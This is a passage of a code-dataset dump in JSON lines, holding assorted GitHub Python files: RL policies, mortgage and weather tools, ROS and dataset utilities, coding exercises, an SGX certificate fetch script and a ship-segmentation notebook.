self._cnn_module = DiscreteCNNModule(\n spec=InOutSpec(input_space=env_spec.observation_space,\n output_space=env_spec.action_space),\n image_format=image_format,\n kernel_sizes=kernel_sizes,\n hidden_channels=hidden_channels,\n strides=strides,\n hidden_sizes=hidden_sizes,\n cnn_hidden_nonlinearity=cnn_hidden_nonlinearity,\n mlp_hidden_nonlinearity=mlp_hidden_nonlinearity,\n hidden_w_init=hidden_w_init,\n hidden_b_init=hidden_b_init,\n paddings=paddings,\n padding_mode=padding_mode,\n max_pool=max_pool,\n pool_shape=pool_shape,\n pool_stride=pool_stride,\n output_nonlinearity=output_nonlinearity,\n output_w_init=output_w_init,\n output_b_init=output_b_init,\n layer_normalization=layer_normalization)\n\n def forward(self, observations):\n \"\"\"Compute the action distributions from the observations.\n\n Args:\n observations(torch.Tensor): Batch of observations of shape\n :math:`(N, O)`. 
Observations should be flattened even\n if they are images as the underlying Q network handles\n unflattening.\n\n Returns:\n torch.distributions.Distribution: Batch distribution of actions.\n dict[str, torch.Tensor]: Additional agent_info, as torch Tensors.\n Do not need to be detached, and can be on any device.\n \"\"\"\n # We're given flattened observations.\n observations = observations.reshape(\n -1, *self._env_spec.observation_space.shape)\n output = self._cnn_module(observations)\n logits = torch.softmax(output, axis=1)\n dist = torch.distributions.Bernoulli(logits=logits)\n return dist, {}\n","repo_name":"rlworkgroup/garage","sub_path":"src/garage/torch/policies/discrete_cnn_policy.py","file_name":"discrete_cnn_policy.py","file_ext":"py","file_size_in_byte":6223,"program_lang":"python","lang":"en","doc_type":"code","stars":1748,"dataset":"github-code","pt":"73"} +{"seq_id":"19881568577","text":"import os\r\n\r\ndef test():\r\n os.system('cd /usr/local')\r\n os.mkdir('tmy')\r\n\r\n libs = {\"numpy\", \"matplotlib\", \"pandas\"}\r\n try:\r\n for lib in libs:\r\n os.system(\"pip install \" + lib)\r\n print(\"Successful\")\r\n except:\r\n print(\"Failed Somehow\")\r\ntest()\r\n\r\n\r\n\r\n\r\n","repo_name":"wanghan79/2020_Option_System","sub_path":"陶梦瑶2018012691/操作系统实验/平时作业2.py","file_name":"平时作业2.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"73"} +{"seq_id":"18021126925","text":"from nacl.signing import VerifyKey\nfrom nacl.encoding import HexEncoder\nimport binascii\nimport os\n\n\ndef verify_signature(signature, message):\n verify_key_hex = os.environ[\"VERIFY_KEY\"]\n key_bytes = binascii.unhexlify(verify_key_hex)\n verify_key = VerifyKey(key_bytes)\n try:\n verify_key.verify(signature.encode(), encoder=HexEncoder)\n signature_body = binascii.unhexlify(signature)\n if signature_body[(-1*len(message)):].decode() != message:\n return False\n except Exception as e:\n print(str(e))\n return False\n return True\n","repo_name":"m-motawea/tf-lb","sub_path":"services/api/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"73"} +{"seq_id":"73601383596","text":"\"\"\"This is the logic file for the mortgage calculator functions\"\"\"\n\nimport altair as alt\nimport pandas as pd\nimport numpy as np\nimport numpy_financial as npf\n\n\ndef get_rates():\n \"\"\"Gets the daily mortgage rates from Bankrate\n\n Returns:\n rate_data (DataFrame): A DataFrame of the daily mortgage rates\"\"\"\n\n # getthe rates\n rate_data = pd.read_html(\n \"https://www.bankrate.com/mortgages/mortgage-rates/#mortgage-industry-insights\"\n )\n rate_data = rate_data[1]\n\n # rename the columns to Program, Rate, APR, Change\n rate_data.columns = [\"Product\", \"Rate\", \"APR\"]\n\n # drop nas\n rate_data.dropna(inplace=True)\n\n # make a column with the rate as a float\n rate_data[\"Rate_flt\"] = rate_data[\"Rate\"].astype(str)\n\n # drop the % from the rate column\n rate_data[\"Rate_flt\"] = rate_data[\"Rate_flt\"].str.replace(\"%\", \"\")\n\n # convert the rate column to a float\n rate_data[\"Rate_flt\"] = rate_data[\"Rate_flt\"].astype(float)\n\n # make a column with the APR as a float\n rate_data[\"APR_flt\"] = rate_data[\"APR\"].astype(str)\n\n # drop the % from the rate column\n rate_data[\"APR_flt\"] = rate_data[\"APR_flt\"].str.replace(\"%\", \"\")\n\n # convert the rate column to a float\n 
rate_data[\"APR_flt\"] = rate_data[\"APR_flt\"].astype(float)\n\n # make a years column with first two characters from product\n rate_data[\"Years\"] = rate_data[\"Product\"].str[:2]\n\n return rate_data\n\n\ndef max_cost(max_pay, max_down, max_rate, term):\n \"\"\"This function calculates the maximum purchase price.\n\n Args:\n max_pay (int): The maximum monthly payment.\n max_down (int): The maximum down payment.\n max_rate (float): The maximum interest rate.\n term (int): The term of the mortgage in years.\n\n Returns:\n max_total (int): The maximum purchase price.\n \"\"\"\n\n # Calculate the maximum purchase price using pv\n max_price = npf.pv(max_rate / 100 / 12, term * 12, max_pay, when=\"begin\")\n\n # Calculate the maximum principal\n max_total = max_price - max_down\n\n return abs(max_total)\n\n\ndef mortgage_cost(principal, rate, term):\n \"\"\"This function calculates the cost of a mortgage.\n\n Args:\n principal (int): The principal of the mortgage.\n rate (float): The interest rate of the mortgage.\n term (int): The term of the mortgage in years.\n\n Returns:\n payment (float): The monthly payment.\n \"\"\"\n\n # Calculate the monthly payment\n monthly_rate = rate / 100 / 12\n payments = term * 12\n payment = (\n principal\n * (monthly_rate * (1 + monthly_rate) ** payments)\n / ((1 + monthly_rate) ** payments - 1)\n )\n\n # Calculate the total cost of the mortgage\n total_cost = payment * payments\n\n # Calculate the total interest paid\n interest_paid = total_cost - principal\n\n return payment, total_cost, interest_paid\n\n\ndef rate_price_matrix(int_rate, pay_price, down_payment):\n \"\"\"This function builds a matrix of affordability.\n\n Args:\n int_rate (float): The interest rate of the mortgage.\n pay_price (int): The purchase price of the home.\n down_payment (int): The down payment of the mortgage.\n\n Returns:\n rate_price_matrix (DataFrame): A DataFrame of the affordability matrix.\"\"\"\n\n # generate a list of sale prices with the pay_price as the center\n price_minus = pay_price - (pay_price * 0.25)\n price_plus = pay_price + (pay_price * 0.25)\n price_list = [\n x for x in range(int(price_minus), int(price_plus), int(pay_price * 0.05))\n ]\n\n # round price_list to the nearst 1000\n price_list = [round(x, -3) for x in price_list]\n\n # generate a list of interest rates with the int_rate as the center\n rate_list = [x for x in range(200, 1100, 50)]\n rate_list = [x / 100 for x in rate_list]\n\n # add the int_rate to the list and sort the list\n rate_list.append(int_rate)\n rate_list = sorted(rate_list)\n\n # filter the table for int_rate +/- 2\n rate_list = [x for x in rate_list if x >= int_rate - 2 and x <= int_rate + 2]\n\n # create a dataframe from the rate_list and price_list\n rp_matrix = pd.DataFrame(columns=rate_list, index=price_list)\n\n # # populate the dataframe with the payment values\n for rate in rate_list:\n for price in price_list:\n rp_matrix.loc[price, rate] = mortgage_cost(price - down_payment, rate, 30)[\n 0\n ]\n\n # # convert all values to integers\n rp_matrix = rp_matrix.astype(int)\n\n # # format the index to appear as dollar amounts\n rp_matrix.index = rp_matrix.index.map(\"${:,.0f}\".format)\n\n # # format the values to appear as dollar amounts\n rp_matrix = rp_matrix.applymap(\"${:,.0f}\".format)\n\n return rp_matrix\n\n\ndef cost_plot(max_list, rate_df):\n \"\"\"This shows a bar chart of the total cost of the mortgage for different year options\n\n Args:\n max_list (list): A list of the maximum monthly payment, down payment, and 
interest rate.\n rate_df (DataFrame): A DataFrame of the interest rates and APRs.\n\n Returns:\n chart (altair.Chart): A bar chart of the total cost of the mortgage for different year options.\n \"\"\"\n\n # make a copy of the rate_df\n rate_df = rate_df.copy()\n\n # add the total cost of the mortgage to the rate_df\n rate_df[\"Total Cost\"] = rate_df[\"Rate_flt\"].apply(\n lambda x: mortgage_cost(max_list, x, 30)[1]\n )\n\n # keep the top four rows and sort by Total Cost\n rate_df = rate_df.sort_values(by=\"Total Cost\").head(11)\n\n # Create the chart\n chart = (\n alt.Chart(rate_df)\n .mark_bar()\n .encode(\n x=alt.X(\"Years:Q\", title=\"Length of Mortgage\", scale=alt.Scale(zero=False)),\n y=alt.Y(\n \"Total Cost:Q\",\n title=\"Total Cost of Mortgage\",\n scale=alt.Scale(zero=False),\n ),\n )\n )\n\n return chart\n\n\ndef heat_map(r_p_matrix):\n \"\"\"This shows a heat map of the total cost of the mortgage for different options\"\"\"\n\n r_p_matrix = r_p_matrix.copy()\n\n # convert the values to floats\n r_p_matrix = r_p_matrix.applymap(\n lambda x: float(x.replace(\"$\", \"\").replace(\",\", \"\"))\n )\n\n # convert the index to floats\n r_p_matrix.index = r_p_matrix.index.map(\n lambda x: float(x.replace(\"$\", \"\").replace(\",\", \"\"))\n )\n\n # extract the index and columns from the r_p_matrix\n x_ind = r_p_matrix.columns\n y_col = r_p_matrix.index\n\n z = r_p_matrix.values\n\n z_med = np.median(z)\n\n x, y = np.meshgrid(x_ind, y_col)\n\n # Convert this grid to columnar data expected by Altair\n source = pd.DataFrame({\"Rate\": x.ravel(), \"Price\": y.ravel(), \"Payment\": z.ravel()})\n\n heat_base = alt.Chart(source).encode(alt.Y(\"Price:O\"), alt.X(\"Rate:O\"))\n\n heat_colors = heat_base.mark_rect().encode(alt.Color(\"Payment:Q\"))\n\n heat_text = heat_base.mark_text(baseline=\"middle\").encode(\n alt.Text(\"Payment:Q\", format=\".0f\"),\n color=alt.condition(\n alt.datum.Payment < z_med, alt.value(\"black\"), alt.value(\"white\")\n ),\n )\n\n heat_chart = heat_colors + heat_text\n\n return heat_chart\n","repo_name":"andrewkroening/fun-money-tools","sub_path":"logic/mort_logic.py","file_name":"mort_logic.py","file_ext":"py","file_size_in_byte":7150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"34738557019","text":"# Import the necessary modules, such as pandas, numpy, sklearn, matplotlib, seaborn, etc.\r\nimport pandas as pd\r\nimport numpy as np\r\nimport sklearn.cluster as cluster\r\nimport sklearn.metrics as metrics\r\nimport sklearn.preprocessing as preprocessing\r\nimport sklearn.decomposition as decomposition\r\nimport sklearn.neighbors as neighbors\r\nimport sklearn.model_selection as model_selection\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nfrom mlxtend.frequent_patterns import apriori, association_rules\r\n\r\n# Define a function to read the data from a CSV file and store it in a pandas dataframe.\r\ndef read_data(file_name):\r\n # Read the CSV file using pandas\r\n df = pd.read_csv(file_name)\r\n # Return the dataframe\r\n return df\r\n\r\n# Define a function to preprocess the data, such as handling missing values, outliers, duplicates, etc.\r\ndef preprocess_data(df):\r\n # Drop any rows with missing values\r\n df = df.dropna()\r\n # Remove any rows with invalid values for user_id or ad_id\r\n df = df[(df['user_id'].apply(lambda x: x.isnumeric())) & (df['ad_id'].apply(lambda x: x.isnumeric()))]\r\n # Convert user_id and ad_id to integer type\r\n df['user_id'] = 
df['user_id'].astype(int)\r\n df['ad_id'] = df['ad_id'].astype(int)\r\n # Remove any duplicates based on user_id and ad_id\r\n df = df.drop_duplicates(subset=['user_id', 'ad_id'])\r\n # Return the cleaned dataframe\r\n return df\r\n\r\n# Define a function to perform exploratory data analysis (EDA), such as calculating summary statistics, visualizing distributions, correlations, etc.\r\ndef perform_eda(df):\r\n # Calculate the summary statistics for the numeric variables\r\n print(df.describe())\r\n \r\n # Calculate the frequency counts for the categorical variables\r\n print(df['device'].value_counts())\r\n print(df['browser'].value_counts())\r\n \r\n # Visualize the distribution of the numeric variables using histograms\r\n df.hist(figsize=(10, 10))\r\n plt.show()\r\n \r\n # Visualize the relationship between the categorical variables using bar charts\r\n sns.countplot(x='device', hue='browser', data=df)\r\n plt.show()\r\n \r\n# Define a function to define user engagement metrics, such as impressions, clicks, conversions, bounce rate, dwell time, etc.\r\ndef define_engagement_metrics(df):\r\n # Define impressions as the number of times an ad was shown to a user\r\n impressions = df.groupby(['user_id', 'ad_id'])['timestamp'].count()\r\n \r\n # Define clicks as the number of times an ad was clicked by a user\r\n clicks = df.groupby(['user_id', 'ad_id'])['clicked'].sum()\r\n \r\n # Define conversions as the number of times an ad led to a purchase by a user\r\n conversions = df.groupby(['user_id', 'ad_id'])['purchased'].sum()\r\n \r\n # Define bounce rate as the percentage of users who left the website after viewing an ad without clicking or purchasing\r\n bounce_rate = (df[(df['clicked'] == 0) & (df['purchased'] == 0)].groupby(['user_id', 'ad_id'])['timestamp'].count() / impressions) * 100\r\n \r\n # Define dwell time as the average time spent by a user on the website after viewing an ad\r\n dwell_time = df.groupby(['user_id', 'ad_id'])['duration'].mean()\r\n \r\n # Return a dictionary of engagement metrics\r\n engagement_metrics = {'impressions': impressions,\r\n 'clicks': clicks,\r\n 'conversions': conversions,\r\n 'bounce_rate': bounce_rate,\r\n 'dwell_time': dwell_time}\r\n \r\n return engagement_metrics\r\n","repo_name":"Kotyara2011/aifunctions","sub_path":"18/user_engagement_analytics.py","file_name":"user_engagement_analytics.py","file_ext":"py","file_size_in_byte":3546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"33339794679","text":"\"\"\"\nA non-empty array A consisting of N integers is given.\nThe array contains an odd number of elements, and each\nelement of the array can be paired with another element\nthat has the same value, except for one element that is\nleft unpaired.\n\"\"\"\nimport cProfile\nfrom math import ceil\n\n\ndef get_unpaired(A):\n value_set = set()\n for elem in A:\n if elem in value_set:\n value_set.remove(elem)\n else:\n value_set.add(elem)\n return value_set.pop()\n\n\nassert get_unpaired([9,3,9]) == 3\n\n\ndef solution(X, Y, D):\n return ceil((Y-X)/D)\n\n\nprint(solution(1, 100, 1))\n","repo_name":"miloradbozic/99_days_of_python_challange","sub_path":"day_6.py","file_name":"day_6.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"17688072643","text":"import sys\n\nros_path = '/opt/ros/kinetic/lib/python2.7/dist-packages'\n\nif ros_path in sys.path:\n print(\"removed ros_path\")\n 
sys.path.remove(ros_path)\n\nimport cv2\nsys.path.append('/opt/ros/kinetic/lib/python2.7/dist-packages')\nsys.path.append(\"/usr/lib/python2.7/dist-packages\")\nimport rospy\nfrom cv_bridge import CvBridge\nfrom sensor_msgs.msg import Image\n\n\nimport time\nimport os\nrospy.init_node(\"ddd\")\n\n\nprint(\"load kitti test images\")\nimage_path = \"/home/chan/dataset-color/sequences/00/image_2\"\nimg_list = sorted(os.listdir(image_path))\n# test_img = test_img[0:372, 0:1240]\npub = rospy.Publisher(\"image\", Image, queue_size=10)\nb = CvBridge()\nidx = 0\nwhile idx != len(img_list):\n\n print(os.path.join(image_path, img_list[idx]))\n test_img = cv2.imread(os.path.join(image_path, img_list[idx]))\n test_img = test_img[0:372, 0:1240]\n cv2.imshow(\"rgb\", test_img)\n cv2.waitKey(1)\n # test_img = cv2.cvtColor(test_img, cv2.COLOR_BGR2GRAY)\n msg = b.cv2_to_imgmsg(test_img, encoding=\"passthrough\")\n #print(msg.encoding)\n pub.publish(msg)\n idx += 1\n time.sleep(0.1)\n\n","repo_name":"AhnDroiid/RGB-Deep-SLAM","sub_path":"test_publisher.py","file_name":"test_publisher.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"72286599276","text":"# Segments.ai upload 'Scott Base 2021-22' dataset\n\nfrom os import environ, listdir\n\nfrom segments import SegmentsClient\nfrom tqdm import tqdm\n\napi_key = environ.get(\"SegmentsAI_api_key\")\ndataset = \"segmentsai1/Seal_2022-22\"\n\nclient = SegmentsClient(api_key)\npath = \"/home/fdi19/SENG402/data/images/scott_base/2021-22\"\n\nfor filename in tqdm(listdir(path)[8775:]):\n name = filename.split('.')[0]\n\n with open(f\"{path}/{filename}\", \"rb\") as f:\n asset = client.upload_asset(f, filename=filename)\n\n attributes = {\"image\": {\"url\": asset[\"url\"]}}\n client.add_sample(dataset, name, attributes)\n","repo_name":"fletcherd3/Scott-Base-Seal-Monitoring-CNN-application-","sub_path":"scripts/segments_ai_upload.py","file_name":"segments_ai_upload.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"11451108655","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport pandas as pd\n\ndf1 = pd.read_csv('./data/geocoded_address_from.csv')\ndf2 = pd.read_csv('./data/geocoded_address_to.csv')\n\n\n# In[4]:\n\n\ndf1 = df1.rename({'latitude':'from_latitude'},axis=1)\ndf1 = df1.rename({'longitude':'from_longitude'},axis=1)\n\ndf2= df2.rename({'latitude':'to_latitude'},axis=1)\ndf2 = df2.rename({'longitude':'to_longitude'},axis=1)\n\n\n# In[12]:\n\n\ndf2['Unnamed: 0']\n\n\n# In[13]:\n\n\ndf2 = df2.drop(df2.columns.difference(['Unnamed: 0','to_latitude','to_longitude']), 1, inplace=True)\n\n\n# In[16]:\n\n\ndf3 = pd.merge(df1,df2,on='Unnamed: 0',how='left')\n\n\n# In[17]:\n\n\ndf3\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"singapore19/team-7","sub_path":"combination.py","file_name":"combination.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"3875250895","text":"# if set set(a) = set(b) = 0, then result is 1\nimport re\n\n\ndef solution(a: str, b:str):\n\n # change lower_characters\n a = a.lower()\n b = b.lower()\n\n a_set = []\n b_set = []\n for i in range(len(a)-1):\n if re.findall('[a-z]',a[i]) and re.findall('[a-z]', a[i+1]):\n a_set.append(a[i]+a[i+1])\n for j in range(len(b)-1):\n if re.findall('[a-z]', b[j]) and 
re.findall('[a-z]',b[j+1]):\n b_set.append(b[j]+b[j+1])\n #intersaction\n inter = []\n for i in a_set:\n if i in b_set:\n inter.append(i)\n b_set.remove(i)\n #union\n sum = a_set + b_set\n\n #union == 0 case\n if len(sum) == 0:\n return 65536\n # else\n return (int(len(inter) / len(sum) * 65536))\n\na = \"FRANCE\"\nb = \"FRENCH\"\na2 = \"handshake\"\nb2 = \"shake hands\"\na3 = \"aa1+aa2\"\nb3 = \"AAAA12\"\na4 = \"E=M*C^2\"\nb4 = \"e=m*c^2\"\nprint (solution(a3,b3))\n","repo_name":"smartx-jshan/Coding_Practice","sub_path":"coding_interview/B5.py","file_name":"B5.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"23270723943","text":"class Validator(object):\n\n def __init__(self, operators, characters):\n self.operators = operators\n self.characters = characters\n\n def validate(self, ex):\n ## & - conjunction,\n ## | - alternative,\n ## ^ - xor,\n ## ~ - negation,\n ## > - implication,\n ## = - equivalence\n ## * - nand\n ex = ex.strip()\n last = ''\n var = 0\n\n # checks if there are: spaces between variables, invalid characters\n for i in ex:\n if i in self.characters:\n if last == ' ' and var == 1:\n raise ValueError(\"invalid variables sequence\")\n var = 1\n\n elif i in self.operators.keys():\n var = 0\n\n elif i not in \"()\" + ' ':\n raise ValueError(\"invalid character\")\n\n last = i\n\n ex = \"\".join(ex.split())\n\n # simple enum\n NUMBER, LETTER, OPERATOR, L_BRACKET, R_BRACKET = range(0, 5)\n\n # checks grammar, brackets and variables' names\n flag = 0\n prev = None\n bracket_stack = []\n\n for i in ex:\n if i in self.characters:\n if prev in [R_BRACKET]: raise ValueError(\"incorrect brackets\")\n\n if prev in [NUMBER] and flag == 0:\n raise ValueError(\"variable starting with a number\")\n\n if i.isnumeric():\n if prev in [None, OPERATOR, L_BRACKET, R_BRACKET]:\n if int(i) not in [0, 1]:\n raise ValueError(\"variable starting with a number\")\n\n if prev == LETTER:\n flag = 1\n prev = NUMBER\n\n else:\n flag = 0\n prev = LETTER\n\n elif i in self.operators.keys():\n if prev in [None, OPERATOR, L_BRACKET] and i != '~':\n raise ValueError(\"binary operator used as an unary\")\n\n if prev in [R_BRACKET, LETTER, NUMBER] and i == '~':\n raise ValueError(\"unary operator used as a binary\")\n prev = OPERATOR\n\n elif i == '(':\n if prev in [LETTER, NUMBER, R_BRACKET]:\n raise ValueError(\"incorrect brackets\")\n prev = L_BRACKET\n bracket_stack.append(L_BRACKET)\n\n elif i == ')':\n if len(bracket_stack) == 0:\n raise ValueError(\"incompatible brackets\")\n bracket_stack.pop()\n\n if prev in [OPERATOR, L_BRACKET]:\n raise ValueError(\"incorrect brackets\")\n prev = R_BRACKET\n\n if prev == OPERATOR:\n raise ValueError(\"operator shouldn't be at the end\")\n\n if len(bracket_stack) > 0:\n raise ValueError(\"incompatible brackets\")\n\n return ex\n","repo_name":"pulnara/Expression-simplifier","sub_path":"validator.py","file_name":"validator.py","file_ext":"py","file_size_in_byte":2925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"4162034568","text":"from readData import ReadMCData\nimport sys\nimport numpy as np\nimport networkx as nx\n\n\"\"\"\nPython script used for converting graphs into formatted input to powergnn package\n\"\"\"\n\ndef getedgeCount(X,index):\n count = 0;\n for each in X[index]:\n if each > 0:\n count = count+1\n\n return count\n\ndef ToGNNinputNumOfGraph(file,numOfGraphs):\n 
file.write(str(numOfGraphs)+\"\\n\")\n\ndef ToGNNinput100(file,labelfile,wrc,X, T): \n\n G = nx.from_numpy_matrix(X)\n\n\n numOfNodesHavingEdge = len(G.nodes)\n\n labelOfThisG = labelfile.readline()\n if len(G.edges) != 0:\n file.write(str(numOfNodesHavingEdge)+' '+labelOfThisG)\n wrc = wrc+1\n for i in range(numOfNodesHavingEdge):\n edgeCount = getedgeCount(X,i)\n tmpAry = X[i]\n connectedTo = np.where( tmpAry == 1)[0]\n file.write(\"0 \"+str(edgeCount)+' ')#write node tag, edgecount\n wrc = wrc + 1\n for j in range(edgeCount):\n file.write(str(connectedTo[j]) + ' ')\n\n file.write('\\n')\n #print(wrc)\n\n return wrc\n\n\nT = 0 #pre calculated\n\nreader = ReadMCData('04', 18200, '../mcDataset/csvsReal2/') # name , MC count, path\nreader.readX()\n\n# reader.writeXcsv()\nprint(\"current Threshold: \" + str(T) + \"\\n\")\n\n\n# write each graph to json, create a dataset for graph2vec\n#labelFile = open('../dataset/csvs/labelAll.csv', \"r\")\nlabelFile = open('../mcDataset/csvsReal2/labelAll.csv','r')\ngnnInFile = open('./gnnIn.txt', \"w+\")\n\n\nnumOfEmptyG=0\nfor i in range(len(reader.X)):\n reader.X[i] = np.array(reader.X[i])\n reader.X[i] = reader.X[i].astype(np.float)\n reader.X[i] = (reader.X[i] > T).astype(int)\n top = np.max(reader.X[i])\n if top == 0:\n numOfEmptyG = numOfEmptyG + 1\n\nwriterowcount = 1\nfor i in range(len(reader.X)):\n if i == 0:\n ToGNNinputNumOfGraph(gnnInFile, len(reader.X)-numOfEmptyG)\n\n writerowcount = ToGNNinput100(gnnInFile, labelFile,writerowcount, reader.X[i],T)\n print(\"finished graph :\"+str(i))\nprint(\"wote rows: \"+str(writerowcount))\nlabelFile.close()\ngnnInFile.close()\n\n\nprint(\"done\")","repo_name":"XiaominWuFred/WGEVIA","sub_path":"MCSWE1.1origin/powergnn/topgnn.py","file_name":"topgnn.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"32449471851","text":"#!/usr/bin/python3\n\nimport urllib.request\n\nINTEL_CACHE_DIR = \"/var/cache/intel-sgx/\"\nCSV_FILE = INTEL_CACHE_DIR + \"pckid_retrieval.csv\"\nFMSPC_FILE = INTEL_CACHE_DIR + \"fmspc.txt\"\nPCK_FILE = INTEL_CACHE_DIR + \"pck.crt\"\n\nCSV = open(CSV_FILE).read().split(\",\")\nurl = f\"https://api.trustedservices.intel.com/sgx/certification/v4/pckcert?encrypted_ppid={CSV[0]}&cpusvn={CSV[2]}&pcesvn={CSV[3]}&pceid={CSV[1]}\"\n\nresponse = urllib.request.urlopen(url)\nfmspc = response.getheader(\"SGX-FMSPC\")\npck = response.read()\n\nopen(FMSPC_FILE, \"w\").write(fmspc)\nopen(PCK_FILE, \"wb\").write(pck)\n","repo_name":"rjzak/sgx-enarx-lab-container","sub_path":"get_fmspc.py","file_name":"get_fmspc.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"8438136417","text":"products = [\n (\"Product1\", 10),\n (\"Product2\", 9),\n (\"Product3\", 12),\n]\n\n\nprices = []\nfor product, price in products:\n prices.append(price)\n\nproduct_prices = map(lambda product: product[1], products)\nprice_only = []\nfor price in product_prices:\n price_only.append(price)\n print(price)\n\nprint(prices)\n","repo_name":"To-heeb/python-prime","sub_path":"loop/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"16344509174","text":"from flask import render_template, request, redirect, url_for, jsonify\nimport requests\nimport json\n\n\nclass Meteo:\n\n\n def __init__(self):\n 
self.city = None\n self.temperature = None\n self.description = None\n self.wind = None\n self.humidity = None\n self.icon = None\n\n def crear_ciudad(self , city , temperature , description ,wind , humidity , icon):\n self.city = city\n self.temperature = temperature\n self.description = description\n self.wind = wind\n self.humidity = humidity\n self.icon = icon\n \n \n def get_weather(self,city):\n url = 'http://api.openweathermap.org/data/2.5/weather?q={}' \\\n '&units=metric&appid=56f9b5c11b1436358ed721716d4e942f'\n \n r = requests.get(url.format(city)).json()\n weather = {\n 'city': city,\n 'temperature': r['main']['temp'],\n 'description': r['weather'][0]['description'],\n 'icon': r['weather'][0]['icon'],\n 'wind': r['wind']['speed'],\n 'humidity' : r['main']['humidity'],\n }\n return weather\n\n\n\n def statusTiempo(self,weather):\n status=None\n tmp = weather[\"temperature\"]\n viento = weather[\"wind\"]\n hume = weather[\"humidity\"]\n \n \n if tmp <= 2 and viento > 40 and hume > 50:\n status = ' Las probabilidades de que las pistas esten cerradas o no se pueda practicar deporte sin riesgos son muy altas'\n\n if tmp >0 and tmp < 15 and viento > 0 and viento < 10 and hume > 20 and hume < 100:\n status = ' Las condiciones son idoneas. Disfruta del dia! '\n \n \n if tmp > 12 and tmp < 25 and viento < 5:\n status = 'Las condiciones son favorables , pero la nieve estara blanda'\n \n if tmp == None and viento == None and hume == None and wind == None:\n status = ' El servicio de estatus personalizado no esta funcionando. Espere unos minutos. '\n \n \n if tmp > -5 and tmp < 5 and viento > 30 :\n status = 'El viento en zonas altas puede ser fuerte. Las rachas pueden superar los 60km/h. Recomendado no subir a zonas altas.'\n \n if tmp < -5 and viento > 10 and viento < 30 and hume < 50 :\n status = ' Evite zonas expuestas , la temperatura podria ser muy baja y las pistas podrian estar congeladas '\n \n if tmp >0 and tmp < 10 and viento > 0 and viento < 60 and hume > 0 and hume < 100:\n status = ' Evite zonas altas y expuestas , las condiciones son favorables en zonas bajas pero en zonas altas el viento podria aumentar considerablemente ' \n \n if tmp < 0 and viento < 10 and hume > 50:\n status = ' Posibles heladas al principio de la jornada. Temperaturas bajas en zonas expuestas. Viento : Flojo. Condiciones bastante buenas para la practica de deporte. 
'\n return status\n \n \n def getCity(self):\n return self.city\n\n def getHumidity(self):\n return self.humidity\n\n def getTemperatura(self):\n return self.temperature\n\n def getWind(self):\n return self.wind\n\n def getDescripcion(self):\n return self.description\n","repo_name":"vaderrama/Proyecto-IV","sub_path":"app/Meteo.py","file_name":"Meteo.py","file_ext":"py","file_size_in_byte":3240,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"37952386099","text":"class BreakException(Exception): pass\r\n\r\ndef make_primes(to):\r\n result = []\r\n n = 2\r\n while len(result) < to:\r\n for i in range(2, int(n**0.5 + 1)):\r\n if n%i == 0: break\r\n else:\r\n result.append(n)\r\n n += 1\r\n return result\r\n \r\nprimes = make_primes(10000)\r\n\r\nfor num in (n for n in range(3, 10**6, 2) if n not in primes):\r\n try:\r\n for prime in primes:\r\n if prime + 2 > num: break\r\n i = Sum = 1\r\n while Sum < num:\r\n Sum = prime + 2*(i**2)\r\n i += 1\r\n assert not Sum == num\r\n except AssertionError:\r\n continue\r\n else:\r\n print (\"%d is the smallest odd composite that cannot be written as the sum of a prime and twice a square\" % num)\r\n break\r\n \r\n","repo_name":"bodik10/EulerSolving","sub_path":"euler 046.py","file_name":"euler 046.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"72641613676","text":"import numpy as np\nimport pandas as pd\n\nimport matplotlib.pyplot as plt\n\nfrom skimage.io import imread\n\nimport os\nprint(os.listdir('../input'))\nsegmentations = pd.read_csv('../input/train_ship_segmentations.csv')\nsegmentations.head()\nprint('Number of images')\nprint(f'- containing ships : {len(segmentations[segmentations.EncodedPixels.isna() == False].ImageId.unique())}')\nprint(f'- not containing ships : {len(segmentations[segmentations.EncodedPixels.isna()].ImageId.unique())}')\nimage_ids = segmentations[segmentations.EncodedPixels.isna() == False].sample(6, random_state=123).ImageId\nimage_ids\nimage_id = image_ids.iat[0]\nimg = imread(f'../input/train/{image_id}')\nprint(f'Image id : {image_id}')\nprint(f'Image shape: {img.shape}')\n\nplt.axis('off')\nplt.imshow(img)\nplt.show()\ndef rle_decode(encoded_pixels, shape):\n s = encoded_pixels.split()\n starts, lengths = [np.asarray(x, dtype=int) for x in (s[::2], s[1::2])]\n starts -= 1\n ends = starts + lengths\n img = np.zeros(shape[0] * shape[1], dtype=np.uint8)\n for start, end in zip(starts, ends):\n img[start:end] = 1\n return img.reshape(shape).T\nfig, axes = plt.subplots(3, 